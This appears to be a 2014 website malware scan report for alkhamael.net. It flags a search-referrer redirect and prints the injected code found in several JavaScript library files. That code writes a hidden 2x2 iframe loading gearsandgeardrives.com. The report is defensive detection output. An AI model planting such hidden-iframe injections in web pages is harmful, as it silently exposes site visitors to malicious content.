Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://alkhamael.net/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: alkhamael.net Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Thu, 28 Aug 2014 02:16:19 GMT Location: http://gearsandgeardrives.com/hrpn.html?h=3134545 Server: Apache Content-Length: 296 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://alkhamael.net/ | 200 OK Content-Length: 13136 Content-Type: text/html | clean |
http://alkhamael.net/index_arabic.htm | 200 OK Content-Length: 16233 Content-Type: text/html | clean |
http://alkhamael.net/index.htm | 200 OK Content-Length: 13136 Content-Type: text/html | clean |
http://alkhamael.net/real_estate.htm | 200 OK Content-Length: 7516 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://gearsandgeardrives.com/hrpn.html?i=3134545 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gearsandgeardrives.com/hrpn.html?i=3134545> | ||
http://alkhamael.net/inquiry_realestate.html | 200 OK Content-Length: 3512 Content-Type: text/html | clean |
http://alkhamael.net/cont_gallery/res/prototype.js | 200 OK Content-Length: 28595 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gearsandgeardrives.com/hrpn.html?j=3134545></iframe>');
document.write(''); document.write(''); document.write(''); document.write(''); var Prototype = { Version: '1.4.0', ScriptFragment: '(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)', emptyFunction: function() {}, K: function(x) {return x} } var Class = { Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://gearsandgeardrives.com/hrpn.html?j=3134545 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gearsandgeardrives.com/hrpn.html?j=3134545> | ||
http://alkhamael.net/cont_gallery/res/scriptaculous.js | 200 OK Content-Length: 7275 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gearsandgeardrives.com/hrpn.html?j=3134545></iframe>');
document.write(''); document.write(''); document.write(''); document.write(''); var Scriptaculous = { Version: '1.5.1', require: function(libraryName) { document.write('<script type="text/javascript" src="'+libraryName+'"></script>'); }, load: funct Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://gearsandgeardrives.com/hrpn.html?j=3134545 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gearsandgeardrives.com/hrpn.html?j=3134545> | ||
http://alkhamael.net/cont_gallery/res/lightbox.js | 200 OK Content-Length: 25130 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gearsandgeardrives.com/hrpn.html?j=3134545></iframe>');
document.write(''); document.write(''); document.write(''); document.write(''); var fileLoadingImage = "res/loading.gif"; var fileBottomNavCloseImage = "res/closelabel.gif"; var resizeSpeed = 7; var borderSize = 10; var imageArray = new Array; var activeImage; if(resiz Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://gearsandgeardrives.com/hrpn.html?j=3134545 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gearsandgeardrives.com/hrpn.html?j=3134545> | ||
http://alkhamael.net/swfobject.js | 200 OK Content-Length: 12003 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gearsandgeardrives.com/hrpn.html?j=3134545></iframe>');
document.write(''); document.write(''); document.write(''); document.write(''); if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}d Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://gearsandgeardrives.com/hrpn.html?j=3134545 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gearsandgeardrives.com/hrpn.html?j=3134545> | ||
http://alkhamael.net/test404page.js | 404 Not Found Content-Length: 394 Content-Type: text/html | clean |
http://alkhamael.net/contact_realestate.htm | 200 OK Content-Length: 3244 Content-Type: text/html | clean |
http://alkhamael.net/contracting.htm | 200 OK Content-Length: 7266 Content-Type: text/html | clean |
http://alkhamael.net/cont_gallery_02/index.html | 200 OK Content-Length: 12874 Content-Type: text/html | clean |
http://alkhamael.net/cont_gallery_02/../cont_gallery/res/prototype.js | 200 OK Content-Length: 28595 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gearsandgeardrives.com/hrpn.html?j=3134545></iframe>');
document.write(''); document.write(''); document.write(''); document.write(''); var Prototype = { Version: '1.4.0', ScriptFragment: '(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)', emptyFunction: function() {}, K: function(x) {return x} } var Class = { Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://gearsandgeardrives.com/hrpn.html?j=3134545 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gearsandgeardrives.com/hrpn.html?j=3134545> | ||
http://alkhamael.net/cont_gallery_02/../cont_gallery/res/scriptaculous.js | 200 OK Content-Length: 7275 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gearsandgeardrives.com/hrpn.html?j=3134545></iframe>');
document.write(''); document.write(''); document.write(''); document.write(''); var Scriptaculous = { Version: '1.5.1', require: function(libraryName) { document.write('<script type="text/javascript" src="'+libraryName+'"></script>'); }, load: funct Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://gearsandgeardrives.com/hrpn.html?j=3134545 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gearsandgeardrives.com/hrpn.html?j=3134545> |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=alkhamael.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://alkhamael.net/
Result: alkhamael.net is not infected or malware details are not published yet.
Result: alkhamael.net is not infected or malware details are not published yet.